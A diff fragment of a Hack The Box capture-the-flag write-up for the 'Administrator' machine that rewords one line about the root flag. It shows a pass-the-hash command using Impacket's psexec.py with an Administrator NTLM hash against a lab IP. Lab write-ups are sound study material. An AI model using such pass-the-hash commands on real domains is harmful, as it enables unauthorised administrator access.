alex-w-hunt/CTF_Writeups/Hack The Box/Administrator.md

 [*] Cleaning up...
 ```

 To now leverage this information to get access as the built-in Domain Administrator account, I attempted to pass the hash via the `psexec.py` utility.
-This was successful and allowed us to obtain the root.txt flag.
+This was successful and allowed us to obtain the root.txt flag from the Administrator's Desktop directory.
 ```
 └──╼ $psexec.py administrator.htb/Administrator@10.10.11.42 -hashes :3dc553ce4b9fd20bd016e098d2d2fd2e
 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies